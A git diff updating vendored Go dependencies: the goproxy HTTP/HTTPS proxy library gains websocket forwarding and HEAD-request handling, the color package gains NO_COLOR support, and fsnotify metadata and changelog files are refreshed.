func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request) {
|
||||
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy, certStore: proxy.CertStore}
|
||||
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), Proxy: proxy, certStore: proxy.CertStore}
|
||||
|
||||
hij, ok := w.(http.Hijacker)
|
||||
if !ok {
|
||||
@ -100,10 +128,10 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
return
|
||||
}
|
||||
ctx.Logf("Accepting CONNECT to %s", host)
|
||||
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
|
||||
proxyClient.Write([]byte("HTTP/1.0 200 Connection established\r\n\r\n"))
|
||||
|
||||
targetTCP, targetOK := targetSiteCon.(*net.TCPConn)
|
||||
proxyClientTCP, clientOK := proxyClient.(*net.TCPConn)
|
||||
targetTCP, targetOK := targetSiteCon.(halfClosable)
|
||||
proxyClientTCP, clientOK := proxyClient.(halfClosable)
|
||||
if targetOK && clientOK {
|
||||
go copyAndClose(ctx, targetTCP, proxyClientTCP)
|
||||
go copyAndClose(ctx, proxyClientTCP, targetTCP)
|
||||
@ -121,8 +149,6 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
}
|
||||
|
||||
case ConnectHijack:
|
||||
ctx.Logf("Hijacking CONNECT to %s", host)
|
||||
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
|
||||
todo.Hijack(r, proxyClient, ctx)
|
||||
case ConnectHTTPMitm:
|
||||
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
|
||||
@ -188,7 +214,7 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
clientTlsReader := bufio.NewReader(rawClientTls)
|
||||
for !isEof(clientTlsReader) {
|
||||
req, err := http.ReadRequest(clientTlsReader)
|
||||
var ctx = &ProxyCtx{Req: req, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy, UserData: ctx.UserData}
|
||||
var ctx = &ProxyCtx{Req: req, Session: atomic.AddInt64(&proxy.sess, 1), Proxy: proxy, UserData: ctx.UserData}
|
||||
if err != nil && err != io.EOF {
|
||||
return
|
||||
}
|
||||
@ -209,6 +235,11 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
|
||||
req, resp := proxy.filterRequest(req, ctx)
|
||||
if resp == nil {
|
||||
if isWebSocketRequest(req) {
|
||||
ctx.Logf("Request looks like websocket upgrade.")
|
||||
proxy.serveWebsocketTLS(ctx, w, req, tlsConfig, rawClientTls)
|
||||
return
|
||||
}
|
||||
if err != nil {
|
||||
ctx.Warnf("Illegal URL %s", "https://"+r.Host+req.URL.Path)
|
||||
return
|
||||
@ -234,10 +265,15 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
ctx.Warnf("Cannot write TLS response HTTP status from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
// Since we don't know the length of resp, return chunked encoded response
|
||||
// TODO: use a more reasonable scheme
|
||||
resp.Header.Del("Content-Length")
|
||||
resp.Header.Set("Transfer-Encoding", "chunked")
|
||||
|
||||
if resp.Request.Method == "HEAD" {
|
||||
// don't change Content-Length for HEAD request
|
||||
} else {
|
||||
// Since we don't know the length of resp, return chunked encoded response
|
||||
// TODO: use a more reasonable scheme
|
||||
resp.Header.Del("Content-Length")
|
||||
resp.Header.Set("Transfer-Encoding", "chunked")
|
||||
}
|
||||
// Force connection close otherwise chrome will keep CONNECT tunnel open forever
|
||||
resp.Header.Set("Connection", "close")
|
||||
if err := resp.Header.Write(rawClientTls); err != nil {
|
||||
@ -248,18 +284,23 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
ctx.Warnf("Cannot write TLS response header end from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
chunked := newChunkedWriter(rawClientTls)
|
||||
if _, err := io.Copy(chunked, resp.Body); err != nil {
|
||||
ctx.Warnf("Cannot write TLS response body from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
if err := chunked.Close(); err != nil {
|
||||
ctx.Warnf("Cannot write TLS chunked EOF from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
if _, err = io.WriteString(rawClientTls, "\r\n"); err != nil {
|
||||
ctx.Warnf("Cannot write TLS response chunked trailer from mitm'd client: %v", err)
|
||||
return
|
||||
|
||||
if resp.Request.Method == "HEAD" {
|
||||
// Don't write out a response body for HEAD request
|
||||
} else {
|
||||
chunked := newChunkedWriter(rawClientTls)
|
||||
if _, err := io.Copy(chunked, resp.Body); err != nil {
|
||||
ctx.Warnf("Cannot write TLS response body from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
if err := chunked.Close(); err != nil {
|
||||
ctx.Warnf("Cannot write TLS chunked EOF from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
if _, err = io.WriteString(rawClientTls, "\r\n"); err != nil {
|
||||
ctx.Warnf("Cannot write TLS response chunked trailer from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
ctx.Logf("Exiting on EOF")
|
||||
@ -293,7 +334,7 @@ func copyOrWarn(ctx *ProxyCtx, dst io.Writer, src io.Reader, wg *sync.WaitGroup)
|
||||
wg.Done()
|
||||
}
|
||||
|
||||
func copyAndClose(ctx *ProxyCtx, dst, src *net.TCPConn) {
|
||||
func copyAndClose(ctx *ProxyCtx, dst, src halfClosable) {
|
||||
if _, err := io.Copy(dst, src); err != nil {
|
||||
ctx.Warnf("Error copying to client: %s", err)
|
||||
}
|
||||
@ -362,7 +403,7 @@ func (proxy *ProxyHttpServer) NewConnectDialToProxyWithHandler(https_proxy strin
|
||||
return c, nil
|
||||
}
|
||||
}
|
||||
if u.Scheme == "https" {
|
||||
if u.Scheme == "https" || u.Scheme == "wss" {
|
||||
if strings.IndexRune(u.Host, ':') == -1 {
|
||||
u.Host += ":443"
|
||||
}
|
||||
@ -412,7 +453,7 @@ func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *ProxyCtx) (*tls
|
||||
var cert *tls.Certificate
|
||||
|
||||
hostname := stripPort(host)
|
||||
config := *defaultTLSConfig
|
||||
config := defaultTLSConfig.Clone()
|
||||
ctx.Logf("signing for %s", stripPort(host))
|
||||
|
||||
genCert := func() (*tls.Certificate, error) {
|
||||
@ -430,6 +471,6 @@ func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *ProxyCtx) (*tls
|
||||
}
|
||||
|
||||
config.Certificates = append(config.Certificates, *cert)
|
||||
return &config, nil
|
||||
return config, nil
|
||||
}
|
||||
}
|
||||
|
55
vendor/github.com/elazarl/goproxy/proxy.go
generated
vendored
55
vendor/github.com/elazarl/goproxy/proxy.go
generated
vendored
@ -30,6 +30,7 @@ type ProxyHttpServer struct {
|
||||
// if nil Tr.Dial will be used
|
||||
ConnectDial func(network string, addr string) (net.Conn, error)
|
||||
CertStore CertStorage
|
||||
KeepHeader bool
|
||||
}
|
||||
|
||||
var hasPort = regexp.MustCompile(`:\d+$`)
|
||||
@ -93,16 +94,40 @@ func removeProxyHeaders(ctx *ProxyCtx, r *http.Request) {
|
||||
// The Connection general-header field allows the sender to specify
|
||||
// options that are desired for that particular connection and MUST NOT
|
||||
// be communicated by proxies over further connections.
|
||||
|
||||
// When server reads http request it sets req.Close to true if
|
||||
// "Connection" header contains "close".
|
||||
// https://github.com/golang/go/blob/master/src/net/http/request.go#L1080
|
||||
// Later, transfer.go adds "Connection: close" back when req.Close is true
|
||||
// https://github.com/golang/go/blob/master/src/net/http/transfer.go#L275
|
||||
// That's why tests that checks "Connection: close" removal fail
|
||||
if r.Header.Get("Connection") == "close" {
|
||||
r.Close = false
|
||||
}
|
||||
r.Header.Del("Connection")
|
||||
}
|
||||
|
||||
type flushWriter struct {
|
||||
w io.Writer
|
||||
}
|
||||
|
||||
func (fw flushWriter) Write(p []byte) (int, error) {
|
||||
n, err := fw.w.Write(p)
|
||||
if f, ok := fw.w.(http.Flusher); ok {
|
||||
// only flush if the Writer implements the Flusher interface.
|
||||
f.Flush()
|
||||
}
|
||||
|
||||
return n, err
|
||||
}
|
||||
|
||||
// Standard net/http function. Shouldn't be used directly, http.Serve will use it.
|
||||
func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request) {
|
||||
//r.Header["X-Forwarded-For"] = w.RemoteAddr()
|
||||
if r.Method == "CONNECT" {
|
||||
proxy.handleHttps(w, r)
|
||||
} else {
|
||||
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy}
|
||||
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), Proxy: proxy}
|
||||
|
||||
var err error
|
||||
ctx.Logf("Got request %v %v %v %v", r.URL.Path, r.Host, r.Method, r.URL.String())
|
||||
@ -113,7 +138,14 @@ func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request)
|
||||
r, resp := proxy.filterRequest(r, ctx)
|
||||
|
||||
if resp == nil {
|
||||
removeProxyHeaders(ctx, r)
|
||||
if isWebSocketRequest(r) {
|
||||
ctx.Logf("Request looks like websocket upgrade.")
|
||||
proxy.serveWebsocket(ctx, w, r)
|
||||
}
|
||||
|
||||
if !proxy.KeepHeader {
|
||||
removeProxyHeaders(ctx, r)
|
||||
}
|
||||
resp, err = ctx.RoundTrip(r)
|
||||
if err != nil {
|
||||
ctx.Error = err
|
||||
@ -124,6 +156,14 @@ func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request)
|
||||
ctx.Logf("Received response %v", resp.Status)
|
||||
}
|
||||
}
|
||||
|
||||
var origBody io.ReadCloser
|
||||
|
||||
if resp != nil {
|
||||
origBody = resp.Body
|
||||
defer origBody.Close()
|
||||
}
|
||||
|
||||
resp = proxy.filterResponse(resp, ctx)
|
||||
|
||||
if resp == nil {
|
||||
@ -139,8 +179,6 @@ func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request)
|
||||
}
|
||||
return
|
||||
}
|
||||
origBody := resp.Body
|
||||
defer origBody.Close()
|
||||
ctx.Logf("Copying response to client %v [%d]", resp.Status, resp.StatusCode)
|
||||
// http.ResponseWriter will take care of filling the correct response length
|
||||
// Setting it now, might impose wrong value, contradicting the actual new
|
||||
@ -153,7 +191,13 @@ func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request)
|
||||
}
|
||||
copyHeaders(w.Header(), resp.Header, proxy.KeepDestinationHeaders)
|
||||
w.WriteHeader(resp.StatusCode)
|
||||
nr, err := io.Copy(w, resp.Body)
|
||||
var copyWriter io.Writer = w
|
||||
if w.Header().Get("content-type") == "text/event-stream" {
|
||||
// server-side events, flush the buffered data to the client.
|
||||
copyWriter = &flushWriter{w: w}
|
||||
}
|
||||
|
||||
nr, err := io.Copy(copyWriter, resp.Body)
|
||||
if err := resp.Body.Close(); err != nil {
|
||||
ctx.Warnf("Can't close response body %v", err)
|
||||
}
|
||||
@ -173,6 +217,7 @@ func NewProxyHttpServer() *ProxyHttpServer {
|
||||
}),
|
||||
Tr: &http.Transport{TLSClientConfig: tlsClientSkipVerify, Proxy: http.ProxyFromEnvironment},
|
||||
}
|
||||
|
||||
proxy.ConnectDial = dialerFromEnv(&proxy)
|
||||
|
||||
return &proxy
|
||||
|
130
vendor/github.com/elazarl/goproxy/websocket.go
generated
vendored
Normal file
130
vendor/github.com/elazarl/goproxy/websocket.go
generated
vendored
Normal file
@ -0,0 +1,130 @@
|
||||
package goproxy
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"crypto/tls"
|
||||
"io"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strings"
|
||||
)
|
||||
|
||||
func headerContains(header http.Header, name string, value string) bool {
|
||||
for _, v := range header[name] {
|
||||
for _, s := range strings.Split(v, ",") {
|
||||
if strings.EqualFold(value, strings.TrimSpace(s)) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func isWebSocketRequest(r *http.Request) bool {
|
||||
return headerContains(r.Header, "Connection", "upgrade") &&
|
||||
headerContains(r.Header, "Upgrade", "websocket")
|
||||
}
|
||||
|
||||
func (proxy *ProxyHttpServer) serveWebsocketTLS(ctx *ProxyCtx, w http.ResponseWriter, req *http.Request, tlsConfig *tls.Config, clientConn *tls.Conn) {
|
||||
host, port, _ := net.SplitHostPort(req.URL.Host)
|
||||
if port == "" {
|
||||
host += ":443"
|
||||
}
|
||||
targetURL := url.URL{Scheme: "wss", Host: host, Path: req.URL.Path}
|
||||
|
||||
// Connect to upstream
|
||||
targetConn, err := tls.Dial("tcp", targetURL.Host, tlsConfig)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error dialing target site: %v", err)
|
||||
return
|
||||
}
|
||||
defer targetConn.Close()
|
||||
|
||||
// Perform handshake
|
||||
if err := proxy.websocketHandshake(ctx, req, targetConn, clientConn); err != nil {
|
||||
ctx.Warnf("Websocket handshake error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
// Proxy wss connection
|
||||
proxy.proxyWebsocket(ctx, targetConn, clientConn)
|
||||
}
|
||||
|
||||
func (proxy *ProxyHttpServer) serveWebsocket(ctx *ProxyCtx, w http.ResponseWriter, req *http.Request) {
|
||||
host, port, _ := net.SplitHostPort(req.URL.Host)
|
||||
if port == "" {
|
||||
host += ":80"
|
||||
}
|
||||
targetURL := url.URL{Scheme: "ws", Host: host, Path: req.URL.Path}
|
||||
|
||||
targetConn, err := proxy.connectDial("tcp", targetURL.Host)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error dialing target site: %v", err)
|
||||
return
|
||||
}
|
||||
defer targetConn.Close()
|
||||
|
||||
// Connect to Client
|
||||
hj, ok := w.(http.Hijacker)
|
||||
if !ok {
|
||||
panic("httpserver does not support hijacking")
|
||||
}
|
||||
clientConn, _, err := hj.Hijack()
|
||||
if err != nil {
|
||||
ctx.Warnf("Hijack error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
// Perform handshake
|
||||
if err := proxy.websocketHandshake(ctx, req, targetConn, clientConn); err != nil {
|
||||
ctx.Warnf("Websocket handshake error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
// Proxy ws connection
|
||||
proxy.proxyWebsocket(ctx, targetConn, clientConn)
|
||||
}
|
||||
|
||||
func (proxy *ProxyHttpServer) websocketHandshake(ctx *ProxyCtx, req *http.Request, targetSiteConn io.ReadWriter, clientConn io.ReadWriter) error {
|
||||
// write handshake request to target
|
||||
err := req.Write(targetSiteConn)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error writing upgrade request: %v", err)
|
||||
return err
|
||||
}
|
||||
|
||||
targetTLSReader := bufio.NewReader(targetSiteConn)
|
||||
|
||||
// Read handshake response from target
|
||||
resp, err := http.ReadResponse(targetTLSReader, req)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error reading handhsake response %v", err)
|
||||
return err
|
||||
}
|
||||
|
||||
// Run response through handlers
|
||||
resp = proxy.filterResponse(resp, ctx)
|
||||
|
||||
// Proxy handshake back to client
|
||||
err = resp.Write(clientConn)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error writing handshake response: %v", err)
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (proxy *ProxyHttpServer) proxyWebsocket(ctx *ProxyCtx, dest io.ReadWriter, source io.ReadWriter) {
|
||||
errChan := make(chan error, 2)
|
||||
cp := func(dst io.Writer, src io.Reader) {
|
||||
_, err := io.Copy(dst, src)
|
||||
ctx.Warnf("Websocket error: %v", err)
|
||||
errChan <- err
|
||||
}
|
||||
|
||||
// Start proxying websocket data
|
||||
go cp(dest, source)
|
||||
go cp(source, dest)
|
||||
<-errChan
|
||||
}
|
5
vendor/github.com/fatih/color/.travis.yml
generated
vendored
5
vendor/github.com/fatih/color/.travis.yml
generated
vendored
@ -1,5 +0,0 @@
|
||||
language: go
|
||||
go:
|
||||
- 1.8.x
|
||||
- tip
|
||||
|
27
vendor/github.com/fatih/color/Gopkg.lock
generated
vendored
27
vendor/github.com/fatih/color/Gopkg.lock
generated
vendored
@ -1,27 +0,0 @@
|
||||
# This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'.
|
||||
|
||||
|
||||
[[projects]]
|
||||
name = "github.com/mattn/go-colorable"
|
||||
packages = ["."]
|
||||
revision = "167de6bfdfba052fa6b2d3664c8f5272e23c9072"
|
||||
version = "v0.0.9"
|
||||
|
||||
[[projects]]
|
||||
name = "github.com/mattn/go-isatty"
|
||||
packages = ["."]
|
||||
revision = "0360b2af4f38e8d38c7fce2a9f4e702702d73a39"
|
||||
version = "v0.0.3"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
name = "golang.org/x/sys"
|
||||
packages = ["unix"]
|
||||
revision = "37707fdb30a5b38865cfb95e5aab41707daec7fd"
|
||||
|
||||
[solve-meta]
|
||||
analyzer-name = "dep"
|
||||
analyzer-version = 1
|
||||
inputs-digest = "e8a50671c3cb93ea935bf210b1cd20702876b9d9226129be581ef646d1565cdc"
|
||||
solver-name = "gps-cdcl"
|
||||
solver-version = 1
|
30
vendor/github.com/fatih/color/Gopkg.toml
generated
vendored
30
vendor/github.com/fatih/color/Gopkg.toml
generated
vendored
@ -1,30 +0,0 @@
|
||||
|
||||
# Gopkg.toml example
|
||||
#
|
||||
# Refer to https://github.com/golang/dep/blob/master/docs/Gopkg.toml.md
|
||||
# for detailed Gopkg.toml documentation.
|
||||
#
|
||||
# required = ["github.com/user/thing/cmd/thing"]
|
||||
# ignored = ["github.com/user/project/pkgX", "bitbucket.org/user/project/pkgA/pkgY"]
|
||||
#
|
||||
# [[constraint]]
|
||||
# name = "github.com/user/project"
|
||||
# version = "1.0.0"
|
||||
#
|
||||
# [[constraint]]
|
||||
# name = "github.com/user/project2"
|
||||
# branch = "dev"
|
||||
# source = "github.com/myfork/project2"
|
||||
#
|
||||
# [[override]]
|
||||
# name = "github.com/x/y"
|
||||
# version = "2.4.0"
|
||||
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/mattn/go-colorable"
|
||||
version = "0.0.9"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/mattn/go-isatty"
|
||||
version = "0.0.3"
|
29
vendor/github.com/fatih/color/README.md
generated
vendored
29
vendor/github.com/fatih/color/README.md
generated
vendored
@ -1,14 +1,11 @@
|
||||
# Color [](https://godoc.org/github.com/fatih/color) [](https://travis-ci.org/fatih/color)
|
||||
|
||||
|
||||
# color [](https://github.com/fatih/color/actions) [](https://pkg.go.dev/github.com/fatih/color)
|
||||
|
||||
Color lets you use colorized outputs in terms of [ANSI Escape
|
||||
Codes](http://en.wikipedia.org/wiki/ANSI_escape_code#Colors) in Go (Golang). It
|
||||
has support for Windows too! The API can be used in several ways, pick one that
|
||||
suits you.
|
||||
|
||||
|
||||

|
||||

|
||||
|
||||
|
||||
## Install
|
||||
@ -17,9 +14,6 @@ suits you.
|
||||
go get github.com/fatih/color
|
||||
```
|
||||
|
||||
Note that the `vendor` folder is here for stability. Remove the folder if you
|
||||
already have the dependencies in your GOPATH.
|
||||
|
||||
## Examples
|
||||
|
||||
### Standard colors
|
||||
@ -84,7 +78,7 @@ notice("Don't forget this...")
|
||||
### Custom fprint functions (FprintFunc)
|
||||
|
||||
```go
|
||||
blue := color.New(FgBlue).FprintfFunc()
|
||||
blue := color.New(color.FgBlue).FprintfFunc()
|
||||
blue(myWriter, "important notice: %s", stars)
|
||||
|
||||
// Mix up with multiple attributes
|
||||
@ -133,14 +127,16 @@ fmt.Println("All text will now be bold magenta.")
|
||||
|
||||
There might be a case where you want to explicitly disable/enable color output. the
|
||||
`go-isatty` package will automatically disable color output for non-tty output streams
|
||||
(for example if the output were piped directly to `less`)
|
||||
(for example if the output were piped directly to `less`).
|
||||
|
||||
`Color` has support to disable/enable colors both globally and for single color
|
||||
definitions. For example suppose you have a CLI app and a `--no-color` bool flag. You
|
||||
can easily disable the color output with:
|
||||
The `color` package also disables color output if the [`NO_COLOR`](https://no-color.org) environment
|
||||
variable is set (regardless of its value).
|
||||
|
||||
`Color` has support to disable/enable colors programatically both globally and
|
||||
for single color definitions. For example suppose you have a CLI app and a
|
||||
`--no-color` bool flag. You can easily disable the color output with:
|
||||
|
||||
```go
|
||||
|
||||
var flagNoColor = flag.Bool("no-color", false, "Disable color output")
|
||||
|
||||
if *flagNoColor {
|
||||
@ -162,6 +158,10 @@ c.EnableColor()
|
||||
c.Println("This prints again cyan...")
|
||||
```
|
||||
|
||||
## GitHub Actions
|
||||
|
||||
To output color in GitHub Actions (or other CI systems that support ANSI colors), make sure to set `color.NoColor = false` so that it bypasses the check for non-tty output streams.
|
||||
|
||||
## Todo
|
||||
|
||||
* Save/Return previous values
|
||||
@ -176,4 +176,3 @@ c.Println("This prints again cyan...")
|
||||
## License
|
||||
|
||||
The MIT License (MIT) - see [`LICENSE.md`](https://github.com/fatih/color/blob/master/LICENSE.md) for more details
|
||||
|
||||
|
25
vendor/github.com/fatih/color/color.go
generated
vendored
25
vendor/github.com/fatih/color/color.go
generated
vendored
@ -15,9 +15,11 @@ import (
|
||||
var (
|
||||
// NoColor defines if the output is colorized or not. It's dynamically set to
|
||||
// false or true based on the stdout's file descriptor referring to a terminal
|
||||
// or not. This is a global option and affects all colors. For more control
|
||||
// over each color block use the methods DisableColor() individually.
|
||||
NoColor = os.Getenv("TERM") == "dumb" ||
|
||||
// or not. It's also set to true if the NO_COLOR environment variable is
|
||||
// set (regardless of its value). This is a global option and affects all
|
||||
// colors. For more control over each color block use the methods
|
||||
// DisableColor() individually.
|
||||
NoColor = noColorExists() || os.Getenv("TERM") == "dumb" ||
|
||||
(!isatty.IsTerminal(os.Stdout.Fd()) && !isatty.IsCygwinTerminal(os.Stdout.Fd()))
|
||||
|
||||
// Output defines the standard output of the print functions. By default
|
||||
@ -33,6 +35,12 @@ var (
|
||||
colorsCacheMu sync.Mutex // protects colorsCache
|
||||
)
|
||||
|
||||
// noColorExists returns true if the environment variable NO_COLOR exists.
|
||||
func noColorExists() bool {
|
||||
_, exists := os.LookupEnv("NO_COLOR")
|
||||
return exists
|
||||
}
|
||||
|
||||
// Color defines a custom color object which is defined by SGR parameters.
|
||||
type Color struct {
|
||||
params []Attribute
|
||||
@ -108,7 +116,14 @@ const (
|
||||
|
||||
// New returns a newly created color object.
|
||||
func New(value ...Attribute) *Color {
|
||||
c := &Color{params: make([]Attribute, 0)}
|
||||
c := &Color{
|
||||
params: make([]Attribute, 0),
|
||||
}
|
||||
|
||||
if noColorExists() {
|
||||
c.noColor = boolPtr(true)
|
||||
}
|
||||
|
||||
c.Add(value...)
|
||||
return c
|
||||
}
|
||||
@ -387,7 +402,7 @@ func (c *Color) EnableColor() {
|
||||
}
|
||||
|
||||
func (c *Color) isNoColorSet() bool {
|
||||
// check first if we have user setted action
|
||||
// check first if we have user set action
|
||||
if c.noColor != nil {
|
||||
return *c.noColor
|
||||
}
|
||||
|
2
vendor/github.com/fatih/color/doc.go
generated
vendored
2
vendor/github.com/fatih/color/doc.go
generated
vendored
@ -118,6 +118,8 @@ the color output with:
|
||||
color.NoColor = true // disables colorized output
|
||||
}
|
||||
|
||||
You can also disable the color by setting the NO_COLOR environment variable to any value.
|
||||
|
||||
It also has support for single color definitions (local). You can
|
||||
disable/enable color output on the fly:
|
||||
|
||||
|
9
vendor/github.com/fsnotify/fsnotify/.editorconfig
generated
vendored
9
vendor/github.com/fsnotify/fsnotify/.editorconfig
generated
vendored
@ -1,5 +1,12 @@
|
||||
root = true
|
||||
|
||||
[*]
|
||||
[*.go]
|
||||
indent_style = tab
|
||||
indent_size = 4
|
||||
insert_final_newline = true
|
||||
|
||||
[*.{yml,yaml}]
|
||||
indent_style = space
|
||||
indent_size = 2
|
||||
insert_final_newline = true
|
||||
trim_trailing_whitespace = true
|
||||
|
1
vendor/github.com/fsnotify/fsnotify/.gitattributes
generated
vendored
Normal file
1
vendor/github.com/fsnotify/fsnotify/.gitattributes
generated
vendored
Normal file
@ -0,0 +1 @@
|
||||
go.sum linguist-generated
|
2
vendor/github.com/fsnotify/fsnotify/.mailmap
generated
vendored
Normal file
2
vendor/github.com/fsnotify/fsnotify/.mailmap
generated
vendored
Normal file
@ -0,0 +1,2 @@
|
||||
Chris Howey <howeyc@gmail.com> <chris@howey.me>
|
||||
Nathan Youngman <git@nathany.com> <4566+nathany@users.noreply.github.com>
|
30
vendor/github.com/fsnotify/fsnotify/.travis.yml
generated
vendored
30
vendor/github.com/fsnotify/fsnotify/.travis.yml
generated
vendored
@ -1,30 +0,0 @@
|
||||
sudo: false
|
||||
language: go
|
||||
|
||||
go:
|
||||
- 1.8.x
|
||||
- 1.9.x
|
||||
- tip
|
||||
|
||||
matrix:
|
||||
allow_failures:
|
||||
- go: tip
|
||||
fast_finish: true
|
||||
|
||||
before_script:
|
||||
- go get -u github.com/golang/lint/golint
|
||||
|
||||
script:
|
||||
- go test -v --race ./...
|
||||
|
||||
after_script:
|
||||
- test -z "$(gofmt -s -l -w . | tee /dev/stderr)"
|
||||
- test -z "$(golint ./... | tee /dev/stderr)"
|
||||
- go vet ./...
|
||||
|
||||
os:
|
||||
- linux
|
||||
- osx
|
||||
|
||||
notifications:
|
||||
email: false
|
16
vendor/github.com/fsnotify/fsnotify/AUTHORS
generated
vendored
16
vendor/github.com/fsnotify/fsnotify/AUTHORS
generated
vendored
@ -4,35 +4,44 @@
|
||||
|
||||
# You can update this list using the following command:
|
||||
#
|
||||
# $ git shortlog -se | awk '{print $2 " " $3 " " $4}'
|
||||
# $ (head -n10 AUTHORS && git shortlog -se | sed -E 's/^\s+[0-9]+\t//') | tee AUTHORS
|
||||
|
||||
# Please keep the list sorted.
|
||||
|
||||
Aaron L <aaron@bettercoder.net>
|
||||
Adrien Bustany <adrien@bustany.org>
|
||||
Alexey Kazakov <alkazako@redhat.com>
|
||||
Amit Krishnan <amit.krishnan@oracle.com>
|
||||
Anmol Sethi <me@anmol.io>
|
||||
Bjørn Erik Pedersen <bjorn.erik.pedersen@gmail.com>
|
||||
Brian Goff <cpuguy83@gmail.com>
|
||||
Bruno Bigras <bigras.bruno@gmail.com>
|
||||
Caleb Spare <cespare@gmail.com>
|
||||
Case Nelson <case@teammating.com>
|
||||
Chris Howey <chris@howey.me> <howeyc@gmail.com>
|
||||
Chris Howey <howeyc@gmail.com>
|
||||
Christoffer Buchholz <christoffer.buchholz@gmail.com>
|
||||
Daniel Wagner-Hall <dawagner@gmail.com>
|
||||
Dave Cheney <dave@cheney.net>
|
||||
Eric Lin <linxiulei@gmail.com>
|
||||
Evan Phoenix <evan@fallingsnow.net>
|
||||
Francisco Souza <f@souza.cc>
|
||||
Gautam Dey <gautam.dey77@gmail.com>
|
||||
Hari haran <hariharan.uno@gmail.com>
|
||||
John C Barstow
|
||||
Ichinose Shogo <shogo82148@gmail.com>
|
||||
Johannes Ebke <johannes@ebke.org>
|
||||
John C Barstow <jbowtie@amathaine.com>
|
||||
Kelvin Fo <vmirage@gmail.com>
|
||||
Ken-ichirou MATSUZAWA <chamas@h4.dion.ne.jp>
|
||||
Matt Layher <mdlayher@gmail.com>
|
||||
Matthias Stone <matthias@bellstone.ca>
|
||||
Nathan Youngman <git@nathany.com>
|
||||
Nickolai Zeldovich <nickolai@csail.mit.edu>
|
||||
Oliver Bristow <evilumbrella+github@gmail.com>
|
||||
Patrick <patrick@dropbox.com>
|
||||
Paul Hammond <paul@paulhammond.org>
|
||||
Pawel Knap <pawelknap88@gmail.com>
|
||||
Pieter Droogendijk <pieter@binky.org.uk>
|
||||
Pratik Shinde <pratikshinde320@gmail.com>
|
||||
Pursuit92 <JoshChase@techpursuit.net>
|
||||
Riku Voipio <riku.voipio@linaro.org>
|
||||
Rob Figueiredo <robfig@gmail.com>
|
||||
@ -41,6 +50,7 @@ Slawek Ligus <root@ooz.ie>
|
||||
Soge Zhang <zhssoge@gmail.com>
|
||||
Tiffany Jernigan <tiffany.jernigan@intel.com>
|
||||
Tilak Sharma <tilaks@google.com>
|
||||
Tobias Klauser <tobias.klauser@gmail.com>
|
||||
Tom Payne <twpayne@gmail.com>
|
||||
Travis Cline <travis.cline@gmail.com>
|
||||
Tudor Golubenco <tudor.g@gmail.com>
|
||||
|
116
vendor/github.com/fsnotify/fsnotify/CHANGELOG.md
generated
vendored
116
vendor/github.com/fsnotify/fsnotify/CHANGELOG.md
generated
vendored
@ -1,6 +1,28 @@
|
||||
# Changelog
|
||||
|
||||
## v1.4.7 / 2018-01-09
|
||||
All notable changes to this project will be documented in this file.
|
||||
|
||||
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
|
||||
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
|
||||
|
||||
## [Unreleased]
|
||||
|
||||
## [1.5.1] - 2021-08-24
|
||||
|
||||
* Revert Add AddRaw to not follow symlinks
|
||||
|
||||
## [1.5.0] - 2021-08-20
|
||||
|
||||
* Go: Increase minimum required version to Go 1.12 [#381](https://github.com/fsnotify/fsnotify/pull/381)
|
||||
* Feature: Add AddRaw method which does not follow symlinks when adding a watch [#289](https://github.com/fsnotify/fsnotify/pull/298)
|
||||
* Windows: Follow symlinks by default like on all other systems [#289](https://github.com/fsnotify/fsnotify/pull/289)
|
||||
* CI: Use GitHub Actions for CI and cover go 1.12-1.17
|
||||
